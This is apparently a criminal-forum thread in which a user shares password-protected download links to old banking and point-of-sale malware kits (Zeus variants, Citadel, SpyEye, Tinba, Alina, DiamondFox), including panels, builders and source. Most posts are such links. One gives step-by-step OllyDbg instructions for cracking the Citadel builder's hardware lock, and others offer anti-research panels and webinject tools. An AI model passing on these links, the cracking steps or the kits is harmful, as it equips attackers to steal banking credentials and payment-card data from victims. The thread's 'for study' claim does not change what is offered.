malware Banking malware collection

[Z1_Supreme]

I open a thread to post a collection of old banking malware for study.
I apologize for my English, I am still learning

I start with Kronos botnet. It's my old panel + exe (without crypt)

Panel + Bin [+3 updates]

[CLIKE]
https://www.sendspace.com/file/3tvp6t
Passwords: xss.pro
[/CLIKE]
I will continue publishing when I have free time

 

[Z1_Supreme]

Citadel [Original panel + original builder clean uncracked]
I will post tut how to crack builder with ollyDBG (next post)
Citadel Panel protect anti security research + more panels
+ Antitracker htaccess
[CLIKE]
https://www.sendspace.com/file/9r57dg
Password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Tutorial how to crack Citadel builder with ollyDBG
[CLIKE]
A small guide on how it can be used as an original citadel license, can be made from
Linux windows and also perfect work

It will only be used on the machine that its number has been changed hardware

advantage
Constructors No infected downloads
all modules work correctly
unpacked
No line breaks

Guie-OllyDbg
start process
stop at the signature line [00401690]
right click
log dump
select ASCII
right click
Edit bin
change the hardware number
Save Changes
[/CLIKE]

 

[Z1_Supreme]

Spyeye 1.3.48 [Clean Panel + builder + plugins]

[CLIKE]
https://www.sendspace.com/file/q1jfl9
Passwords: xss.pro
[/CLIKE]

 

[Z1_Supreme]

ZEUS Collection:
- Antitracker
- Zeus 2.8.0.9 (secure update)
- Zeus 2.0.9.15 (Source and builder)
- Zeus 2.1.0.1 (Security panel + builder)
- Zeus EVA
- Zeus First Version
- Panel Skins
- And more ..
[CLIKE]
https://www.sendspace.com/file/s26jmm
Password: xss.pro
[/CLIKE]
Update:
- More Zeus Panel Skins [FBI / CardingWold / Zeus v3 skin]
- Zeus Robot
- Zeus Red
[CLIKE]

https://oshi.at/huddHy

xss.pro[/CLIKE]
- Zitmo [Zeus APK]

https://xss.pro/threads/36387/post-220617

- Zeus The Missing Manual

https://oshi.at/DFTmBG

xss.pro

 

[Z1_Supreme]

Tinba banker [Panel + source]
1. Tinba banker
2. Tinba anti research
[CLIKE]
https://www.sendspace.com/file/lizaqc
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Zusy Bot or Hunter Bot [Panel + source]
[CLIKE]
https://www.sendspace.com/file/agcgwn
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Zeus KINS [Panel + source]
[CLIKE]
https://www.sendspace.com/file/dfzuta
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

DNS Changer [Panel + Builder]
[CLIKE]
https://www.sendspace.com/file/yhixh0
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Zeus Evolution [Panel + Builder]
[CLIKE]
https://www.sendspace.com/file/sxg0on
password: xss.pro
[/CLIKE]
UPDATE: Zeus Evolution [Panel fixed + Source]
[CLIKE]

https://oshi.at/GxGdAM

[/CLIKE][CLIKE]
xss.pro[/CLIKE]

 

[Z1_Supreme]

Zeus V3 [Panel + Builder]
[CLIKE]
https://www.sendspace.com/file/b2wpsz
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Zeus ICE IX - Zeus 2.8.0.9 - Zeus KINS [PANELS ANTIGOV]
[CLIKE]
https://www.sendspace.com/file/zne8nm
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Alina POS malware [Panel + source + rootkit]
[CLIKE]
https://www.sendspace.com/file/zw0igg
password: xss.pro
[/CLIKE]

 

[Z1_Supreme]

Soraya POS malware [Panel + bin]
[CLIKE]
https://www.sendspace.com/file/459nmd
password: xss.pro
[/CLIKE]

 

[perceptron]

Hey, good stuff man, pretty sure someone will find a use for these.
Just one thing tho, try to post these in a batch of 5 or 10 under spoiler so it's tidy or even better use table to sort all of this stuff, that would make it look super nice and convenient for folks.
That's just the way I see it and you could wrap it all into hide for likes etc.
Example:

#	Name	Download link	Password
1	Soraya POS malware [Panel + bin]	https://www.sendspace.com/file/459nmd	xss.pro

P.S
I don't recommend using SendSpace at all, after a month or two 90% of links will be down. There are better alternatives around, I tend to use oshi.at a lot, just make sure to save management link to prolong file's availability period later on.
Cheers.

 

[Z1_Supreme]

Hey, good stuff man, pretty sure someone will find a use for these.
Just one thing tho, try to post these in a batch of 5 or 10 under spoiler so it's tidy or even better use table to sort all of this stuff, that would make it look super nice and convenient for folks.
That's just the way I see it and you could wrap it all into hide for likes etc.
Example:

#	Name	Download link	Password
1	Soraya POS malware [Panel + bin]	https://www.sendspace.com/file/459nmd	xss.pro

P.S
I don't recommend using SendSpace at all, after a month or two 90% of links will be down. There are better alternatives around, I tend to use oshi.at a lot, just make sure to save management link to prolong file's availability period later on.
Cheers.

Thanks, I will upload the files to oshi.at.
This is my collection of many years of work that I have taken from my old HDD. I will keep looking in.
I have more malware like ICE IX and older versions of Spyeye, Citadel ... etc ...

 

[Z1_Supreme]

Test POS Malware without card reader
[CLIKE]

https://oshi.at/Aesrwf

passwords: xss.pro[/CLIKE]

 

[Z1_Supreme]

Citadel Webinject Development [Tools + tut]
[CLIKE]

https://oshi.at/moRUwR

xss.pro

https://oshi.at/ieLbcj

[/CLIKE]

 

[Z1_Supreme]

Now I will tell the never before told story about DiamondFox.
It all started in a project called PHARMING BOTNET oriented for Latin America which I was a Collaborator of the creator of PHARMING BOTNET and he shared a copy of its first version with me, this version was used privately and was never for sale, I am going to do it publish for the first time

PHARMING BOTNET [Panel + DB + Builder + HWID Generator]

https://oshi.at/MNPUJM

password: xss.pro

I finished my work and never had contact with the author again
At some point I think that the project was sold or stolen and changed its author
Then it was updated, put a commercial name and put up for sale ... Gorynch botnet

Gorynch botnet [Panel + Builder + Licence + Manual]

https://oshi.at/EJTiiN

password: xss.pro

Then it was updated and the name was changed to DiamondFox

DiamondFox OLD version [Panel + Builder Cracked + Manual]
[CLIKE]

https://oshi.at/EJTiiN

password: xss.pro[/CLIKE]
For a while the sale and development of DiamondFox stopped and returned to sale on exploit.in under a change of author that continued its development. Everything I am writing is everything I have been able to observe, I cannot assure 100% veracity of the last author changes

Download all versions and judge for yourselves. I hope you liked the reading

Cheers

 

[Z1_Supreme]

Performing searches on the internet some sources are on github as someone comments, I have not downloaded them from github, when i got this they weren't on github lol, you will surely find some differences, it would also be interesting for those who talk about the sources that I upload, are on github they published it to do a great collection in this thread

GitHub - m0n0ph1/Malware-Collection: Malware source code samples leaked online uploaded to GitHub for those who want to analyze the code.

Malware source code samples leaked online uploaded to GitHub for those who want to analyze the code. - m0n0ph1/Malware-Collection

github.com

Many people with lack of self-esteem who are only attentive to criticize others to make themselves see that they are smarter or more professional. Friends this is not a competition. If it is not useful for you, just ignore it, it will surely be useful for someone else.